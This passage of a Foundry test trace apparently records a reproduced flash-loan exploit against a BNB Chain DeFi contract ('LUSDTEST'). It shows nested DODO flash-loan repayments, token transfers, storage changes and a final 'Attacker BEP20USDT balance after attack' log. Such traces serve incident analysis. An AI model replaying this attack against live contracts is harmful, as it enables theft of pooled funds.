    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476], value: 80262899024076070546678 [8.026e22])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000028397275059285e6e6f30 → 0x00000000000000000000000000000000000000000002729817d515d33161023a
    │   │   │   │   │   │   │   │   │   │   │   @ 0x82bcc9253272a2176c253e21a54ca24177e771a367828bd1251261eb930b899c: 0 → 0x0000000000000000000000000000000000000000000010ff0f7b43552d0d6cf6
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 623689206204437730689 [6.236e20]
    │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 80262899024076070546678 [8.026e22]
    │   │   │   │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 623689206204437730689 [6.236e20]
    │   │   │   │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(DPP: [0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 80262899024076070546678 [8.026e22]
    │   │   │   │   │   │   │   │   ├─ emit DODOFlashLoan(: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 80262899024076070546678 [8.026e22])
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   ├─ [3271] BEP20USDT::transfer(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], 996035460401357770516820 [9.96e23])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A], value: 996035460401357770516820 [9.96e23])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0 → 0x00000000000000000000000000000000000000000000d2eb30c4bcfe8130e954
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000002729817d515d33161023a → 0x000000000000000000000000000000000000000000019face71058d4b03018e6
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [2531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 81947694923278467 [8.194e16]
    │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 996035460401357770516820 [9.96e23]
    │   │   │   │   │   ├─ [531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 81947694923278467 [8.194e16]
    │   │   │   │   │   ├─ [531] BEP20USDT::balanceOf(DPPOracle3: [0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 996035460401357770516820 [9.96e23]
    │   │   │   │   │   ├─ emit DODOFlashLoan(: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 996035460401357770516820 [9.96e23])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3271] BEP20USDT::transfer(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], 972580983084971821937898 [9.725e23])
    │   │   │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], value: 972580983084971821937898 [9.725e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa1bb3ea675b840e963c59cc969a45ddfeefd63ae58d64dc7dba145305988350c: 0 → 0x00000000000000000000000000000000000000000000cdf3b88258e34788b4ea
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000019face71058d4b03018e6 → 0x00000000000000000000000000000000000000000000d1b92e8dfff168a763fc
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   │   │   └─ ← [Return] 4583838868341494 [4.583e15]
    │   │   │   ├─ [531] BEP20USDT::balanceOf(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   │   │   └─ ← [Return] 972580983084971821937898 [9.725e23]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   │   │   └─ ← [Return] 4583838868341494 [4.583e15]
    │   │   │   ├─ [531] BEP20USDT::balanceOf(DPPOracle2: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   │   │   └─ ← [Return] 972580983084971821937898 [9.725e23]
    │   │   │   ├─ emit DODOFlashLoan(: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 972580983084971821937898 [9.725e23])
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] BEP20USDT::transfer(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], 980925880461681526369519 [9.809e23])
    │   │   │   ├─ emit Transfer(from: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618], value: 980925880461681526369519 [9.809e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000d1b92e8dfff168a763fc → 0x00000000000000000000000000000000000000000000020115549819521a770d
    │   │   │   │   @ 0xf293ac4f2016c12f970d35cabe52ede86e940214b15208a1107f43cb9557cf4a: 0 → 0x00000000000000000000000000000000000000000000cfb8193967d8168cecef
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 490278478053300131 [4.902e17]
    │   ├─ [531] BEP20USDT::balanceOf(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 980925880461681526369519 [9.809e23]
    │   ├─ [531] 0x7130d2A12B9BCbFAe4f2634d864A1Ee1Ce3Ead9c::balanceOf(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 490278478053300131 [4.902e17]
    │   ├─ [531] BEP20USDT::balanceOf(DPPOracle1: [0x26d0c625e5F5D6de034495fbDe1F6e9377185618]) [staticcall]
    │   │   └─ ← [Return] 980925880461681526369519 [9.809e23]
    │   ├─ emit DODOFlashLoan(: LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 980925880461681526369519 [9.809e23])
    │   └─ ← [Stop]
    ├─ [531] BEP20USDT::balanceOf(LUSDTEST: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 9464716730420359231245 [9.464e21]
    ├─ [425] BEP20USDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker BEP20USDT balance after attack", val: 9464716730420359231245 [9.464e21], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af430b: 0 → 1
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af4308: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 53.02s (50.60s CPU time)

Ran 2 test suites in 54.26s (54.00s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
